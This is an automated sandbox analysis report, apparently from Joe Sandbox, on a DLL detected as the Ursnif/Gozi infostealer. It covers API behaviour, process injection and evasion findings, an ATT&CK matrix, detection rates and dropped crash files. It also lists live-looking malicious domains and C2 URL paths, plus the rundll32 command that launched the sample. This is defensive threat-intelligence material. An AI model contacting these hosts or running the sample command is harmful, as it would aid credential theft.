                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_6E90B316 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_6E90B316

                      HIPS / PFW / Operating System Protection Evasion:

                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.97.161.50 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 52.98.207.210 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 40.101.60.226 187
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Domain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 13.82.28.61 187
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\616412739e268.dll',#1
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmp Binary or memory string: Program Manager
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmp Binary or memory string: Progman
                      Source: loaddll32.exe, 00000002.00000002.680579668.00000000014E0000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000000.493972820.0000000003550000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.682312737.0000000003A50000.00000002.00020000.sdmp, rundll32.exe, 00000009.00000000.507430599.00000000036D0000.00000002.00020000.sdmp, rundll32.exe, 0000000A.00000000.510567830.0000000003A80000.00000002.00020000.sdmp Binary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW, 2_2_6E909EB5
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW, 2_2_6E930E4C
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 2_2_6E930429
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 2_2_6E93E448
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 2_2_6E93EA21
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 2_2_6E93E3AD
                      Source: C:\Windows\System32\loaddll32.exe Code function: EnumSystemLocalesW, 2_2_6E93E344
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 2_2_6E93E0A2
                      Source: C:\Windows\System32\loaddll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 2_2_6E93E84C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 6_2_6E909EB5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 6_2_6E930E4C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_6E930429
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_6E93E448
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 6_2_6E93EA21
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_6E93E3AD
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 6_2_6E93E344
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 6_2_6E93E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_6E93E84C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 9_2_6E909EB5
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 9_2_6E930E4C
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 9_2_6E930429
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 9_2_6E93E448
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 9_2_6E93EA21
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 9_2_6E93E3AD
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 9_2_6E93E344
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 9_2_6E93E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 9_2_6E93E84C
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_00A3A82B cpuid 2_2_00A3A82B
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D1172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 2_2_6E8D1172
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E92FF15 _free,_free,_free,GetTimeZoneInformation,_free, 2_2_6E92FF15
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_6E8D1825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 2_2_6E8D1825
                      Source: C:\Windows\System32\loaddll32.exe Code function: 2_2_00A3A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 2_2_00A3A82B

                      Stealing of Sensitive Information:

                      Yara detected Ursnif
                      Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 7088, type: MEMORYSTR
                      Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 4432, type: MEMORYSTR

                      Remote Access Functionality:

                      Yara detected Ursnif

                      Mitre Att&ck Matrix

                      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      Valid Accounts | Windows Management Instrumentation 2 | Path Interception | Process Injection 112 | Virtualization/Sandbox Evasion 1 | Input Capture 1 | System Time Discovery 2 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                      Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection 112 | LSASS Memory | Security Software Discovery 21 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Virtualization/Sandbox Evasion 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 2 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 14 | SIM Card Swap | | Carrier Billing Fraud
                      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | Account Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Owner/User Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 23 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                      Behavior Graph

                      [Behavior graph image not reproduced. Behavior Graph ID: 500413; Sample: 616412739e268.dll; Start date: 12/10/2021; Architecture: WINDOWS; Score: 88]


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      616412739e268.dll | 6% | Virustotal |
                      616412739e268.dll | 24% | ReversingLabs | Win32.Infostealer.Gozi

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      2.2.loaddll32.exe.a30000.0.unpack | 100% | Avira | HEUR/AGEN.1108168
                      6.2.rundll32.exe.31a0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label
                      https://areuranel.website/ | 0% | Avira URL Cloud | safe
                      https://breuranel.website/ | 0% | Avira URL Cloud | safe
                      https://wweuranel.website/ | 0% | Avira URL Cloud | safe
                      https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
                      https://mem.gfx.ms/meversion/?partner=msn&market=en-us" | 0% | Avira URL Cloud | safe
                      https://areuranel.website/V | 0% | Avira URL Cloud | safe
                      https://breuranel.website/liopolo/QA56VbJ0mf8IO/bu7B6hDH/DMBL8lGiGevOerWP3oEITXA/XSYJaQdf97/rSRSo5gw | 0% | Avira URL Cloud | safe
                      https://areuranel.website/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcax_2 | 0% | Avira URL Cloud | safe
                      https://areuranel.website:443/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrc | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      msn.com | 13.82.28.61 | true | false | | high
                      outlook.com | 40.97.161.50 | true | false | | high
                      HHN-efz.ms-acdc.office.com | 52.98.207.210 | true | false | | high
                      FRA-efz.ms-acdc.office.com | 52.98.207.210 | true | false | | high
                      www.msn.com | unknown | unknown | false | | high
                      www.outlook.com | unknown | unknown | false | | high
                      areuranel.website | unknown | unknown | true | | unknown
                      breuranel.website | unknown | unknown | true | | unknown
                      outlook.office365.com | unknown | unknown | false | | high

                      Contacted URLs

                      URLs from Memory and Binaries
                                                                                    unknown
                                                                                    https://areuranel.website/Vloaddll32.exe, 00000002.00000002.678421044.0000000000C84000.00000004.00000020.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://outlook.office365.com/&/loaddll32.exe, 00000002.00000003.593552151.0000000000C94000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://ogp.me/ns#loaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmp, loaddll32.exe, 00000002.00000003.504622760.0000000003329000.00000004.00000040.sdmp, rundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.534287192.000000000368E000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        https://outlook.com/signup/liopolo/_2FIM7vtUZ4D/xYsj75o0T3l/xgIGXyko1bBc35/qMEGgdco4EjP8aQKQAv1_/2Frloaddll32.exe, 00000002.00000003.590802963.0000000000CD4000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          https://outlook.office365.com/signup/liopolo/4n8rYhECWMDt1xafNsN/Eaa1J0ldXQTsDJvMLeSORg/0uI4SoaziSZwrundll32.exe, 00000006.00000003.668405116.0000000003688000.00000004.00000001.sdmp, rundll32.exe, 00000006.00000003.624862887.0000000003690000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            https://breuranel.website/liopolo/QA56VbJ0mf8IO/bu7B6hDH/DMBL8lGiGevOerWP3oEITXA/XSYJaQdf97/rSRSo5gwloaddll32.exe, 00000002.00000003.593466694.0000000000C84000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.msn.com/mail/liopolo/Vn4JvoFId6Cp3NLYZ/ukfCWWcxchPj/qCUcA7g4p8o/IzqGGngZx49dkT/_2Fc3sEBBloaddll32.exe, 00000002.00000003.504569485.0000000000CD1000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              https://www.msn.com/mail/liopolo/iPe0RJr3YRoIqgJZ/bp29G1GzQQlGJM_/2FuLuVprzaPw0SE4HN/zn7OVuGKs/tq7Ctrundll32.exe, 00000006.00000003.534916605.0000000003686000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                https://areuranel.website/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcax_2loaddll32.exe, 00000002.00000002.677754836.0000000000C1B000.00000004.00000020.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://www.msn.com/?refurl=%2fmail%2fliopolo%2fVn4JvoFId6Cp3NLYZ%2fukfCWWcxchPj%2fqCUcA7g4p8o%2fIzqloaddll32.exe, 00000002.00000003.504524772.0000000000CD9000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  https://areuranel.website:443/liopolo/qMPdkFO4cnrxNn/DIGveFyn_2Bf4Yye5GCKi/4Qd67_2BeQZdWYi_/2BSsROrcloaddll32.exe, 00000002.00000002.678292868.0000000000C70000.00000004.00000020.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown

                                                                                                  Contacted IPs


                                                                                                  Public

IP | Domain | Country | ASN | ASN Name | Malicious
40.97.161.50 | outlook.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
13.82.28.61 | msn.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
52.98.207.210 | HHN-efz.ms-acdc.office.com | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
40.101.60.226 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | true

                                                                                                  Private

                                                                                                  IP
                                                                                                  192.168.2.1

                                                                                                  General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 500413
Start date: 12.10.2021
Start time: 00:47:57
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 6s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 616412739e268.dll
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 37
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.troj.evad.winDLL@14/12@15/5
EGA Information: Failed
HDC Information:
• Successful, ratio: 16.7% (good quality ratio 16.1%)
• Quality average: 79%
• Quality standard deviation: 28.5%
HCA Information:
• Successful, ratio: 68%
• Number of executed functions: 91
• Number of non-executed functions: 273
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Sleeps bigger than 120000ms are automatically reduced to 1000ms
• Found application associated with file extension: .dll
Warnings:
                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
• Not all processes were analyzed, report is missing behavior information
                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                  Simulations

                                                                                                  Behavior and APIs

Time | Type | Description
00:50:33 | API Interceptor | 1x Sleep call for process: loaddll32.exe modified
00:50:38 | API Interceptor | 1x Sleep call for process: rundll32.exe modified

                                                                                                  Joe Sandbox View / Context

                                                                                                  IPs


                                                                                                                                Domains


                                                                                                                                ASN


                                                                                                                                JA3 Fingerprints


                                                                                                                                Dropped Files

                                                                                                                                No context

                                                                                                                                Created / dropped Files

                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_134e49f4\Report.wer
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11922
                                                                                                                                Entropy (8bit):3.7581261502125924
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:TFs6iG0oXWHygBWjed+x/u7sMS274ItWcq:y6igXOygBWje8/u7sMX4ItWcq
                                                                                                                                MD5:393A3C31649BD29973306D0F85A32BCC
                                                                                                                                SHA1:FF3907D20E074D3DA8B205FD00E430C7AC757B8B
                                                                                                                                SHA-256:3474F1F823B321D214E319FB6DCEE5DAE41798381419B3FFFA520BFD4908C3F0
                                                                                                                                SHA-512:1636C709A088992524FA1E9420BBFC1DB3C81D98987D259ABE8829A5620958742106A588D897A76F6042E454A393EECF27E1A6889124E852D4AFBA478685F43E
                                                                                                                                Malicious:false
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_120258ba\Report.wer
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12042
                                                                                                                                Entropy (8bit):3.764569090051945
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:WYiJ0oX1HBUZMX4jed+x/u7sMS274It7c5:1inXlBUZMX4je8/u7sMX4It7c5
                                                                                                                                MD5:3F8355DAD9CF57B7376FA2D5C6AD95EE
                                                                                                                                SHA1:CB52C465F96C0A0AF69590C43FBDDB918D2A7E9E
                                                                                                                                SHA-256:4F5DC83FE9F23AE55485CF812B54AEEC15BF2D0103BEB805F7D6F96ED6E8EBBE
                                                                                                                                SHA-512:AD507D613D8012026CCEEF32126498B7BD0AD69A3344748BD5CF594B297EB5FAE922D63E7C9DEE8A92639FEF111B20F223D7ACA1419A33797EAFBA5820ED8360
                                                                                                                                Malicious:false
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_16ee2ecb\Report.wer
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):12042
                                                                                                                                Entropy (8bit):3.763578802257413
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Nyc0iA0oX1HBUZMX4jed+5/u7sMS274It7cl:X0iWXlBUZMX4jeU/u7sMX4It7cl
                                                                                                                                MD5:AB66B0C65430D7784DCE9F3BFD18E012
                                                                                                                                SHA1:AE58C3155D963E5024E45440CFB891E9BD61DB13
                                                                                                                                SHA-256:0D3F8A590A42953E0C4B0592B7331C6F080DEDF99C372F3AE4B8D0625DDB97B3
                                                                                                                                SHA-512:890813DF532F81B17C3A7F7B28A2038E88748D112CCD989CC3E82C09CFC34F5CACCE5034E508068BF9EC84B8839F9A47DA42FF3B137CCD20C2D93A5F8AA3FA9B
                                                                                                                                Malicious:false
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER1549.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8406
                                                                                                                                Entropy (8bit):3.698743070989418
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNi3jd6W6YVD96dgmf8NSMCprC89bnwUWsfStm:RrlsNiTd6W6YJ96dgmf8NSvnwU1fB
                                                                                                                                MD5:843C76288B5B86E920CBDAFDF7178B67
                                                                                                                                SHA1:014D8DDC43C2CFC67BBBF093D60C71A800068F55
                                                                                                                                SHA-256:C169356D757A52AEAEDA71E531886B3481BEA92953B9B11A01F7D5D07A934A5A
                                                                                                                                SHA-512:F168C58370610308E24B530BD778B881D87665AE5EC988219D2A89A03BAFACD53CB51268AD250FC8B24F67DADEEE2EBE855FDF3C62923FC6C6FD5EA3D0DF3378
                                                                                                                                Malicious:false
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER18F4.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4771
                                                                                                                                Entropy (8bit):4.481204319652307
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8Bl78fm8M4JCdsPMFGD+q8vjsPKI4SrSxd:uITfxC0SNb4JdxKmdDWxd
                                                                                                                                MD5:B3096293B157544A11E07B9BC420DD68
                                                                                                                                SHA1:57259C5A2E808FD52947AE76E5F47FB0E56FF8B8
                                                                                                                                SHA-256:6ECFDFC49D3ED528BFC1B179F42DF660BAA7F19736D51855C79376AE6F4FE475
                                                                                                                                SHA-512:581BFB1D0B14C0309E3B64C3D8D1260118245471C7B67F9B3E932508193A3953ADF51D007157CC9D27797DACDEC1888B683B829AF1D3A97D6BB2D9D6F8C1F5CD
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DF3.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:50:56 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):57848
                                                                                                                                Entropy (8bit):2.011654227292554
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:0eaydMcdJA1SL+3x+8nKyCPEAUXjxQk76EVEMRoQwv5jYMOnPTgD:80McbA1SL+3x+8nwPEftQiV8QwROTq
                                                                                                                                MD5:56D9C114464C0EAB37C5F1BA2CA25BD9
                                                                                                                                SHA1:CB86B8F90DE79CF655931CC1473376206F3AB4F1
                                                                                                                                SHA-256:7A50D18CA338C0603708D0AAE04ACE11D6AFAABB62E18955544488A0789FD2C1
                                                                                                                                SHA-512:F726BEEBEFD4EEC6630471826DADF2A8000272FEC02C2B037B14F4B6291A3AF158C86D9A22FE99B6D38133BA26352717A19333FEBF3ED66C3F23034190571238
                                                                                                                                Malicious:false
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A87.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8302
                                                                                                                                Entropy (8bit):3.694733762852044
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNiYjA6yj6YVx6dgmfTkOSiCpDp89bRRsf8U7m:RrlsNiSA6Q6Yj6dgmfTkOS0RKf8
                                                                                                                                MD5:AF2F6F97AC027E2DE27FA9E9412E71C6
                                                                                                                                SHA1:F7A825A5D6E3D83D7F5DD819370635A22A337A12
                                                                                                                                SHA-256:EC4A2E76921EE09528478069C9C4AFD67F13B7D091456816762F9754E888BBC4
                                                                                                                                SHA-512:C51ABDEC5497BBC13BFE4C4561DB25FE8D0CC7F0EA242C52FE4EEF90D13B26F4B77DB4710F99B1679ACC20428771F47D94494644DF55F99CB2FBDBA4102D58F9
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6012</Pid>
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AA5.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:51:00 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35284
                                                                                                                                Entropy (8bit):2.385701210745147
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:QhtbBKt5jXjMzQ1IDZqyqU10+hesUgks4TUhegfXPO+:cBKDrQzQaqyNhe7gATUD/V
                                                                                                                                MD5:26D47BBB77204AEDD136BCC1854DA26A
                                                                                                                                SHA1:CA3F25C975A62C71298F927C5636EB23E6E7D066
                                                                                                                                SHA-256:594A65A664C3A120943D2C24EF892E6C7E3C72FD169628A57A4039B4714593F7
                                                                                                                                SHA-512:F58931527BA57F956163D14848BF67B1E0876609C0144226A74316058E70503F6331BABC6161AB40994338E3D0B6CD212D5944ABACACCB87D5C03D6C38D2698C
                                                                                                                                Malicious:false
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F6A.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4630
                                                                                                                                Entropy (8bit):4.4533004304049015
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8BV8fm8M4JCds9FhF9I+q8/5WY4SrS1d:uITfxC0SNAJ3kHYDW1d
                                                                                                                                MD5:361E1FB3A3A1D969F46C202D9F6A6BE9
                                                                                                                                SHA1:2CB93394875E4A71BFB33DA586C42FB25F9FA40D
                                                                                                                                SHA-256:41E6D6A75CCF51226DE7B4D0C8015FD4D2D4DA5CC95EF56E60F411B8CE2834C4
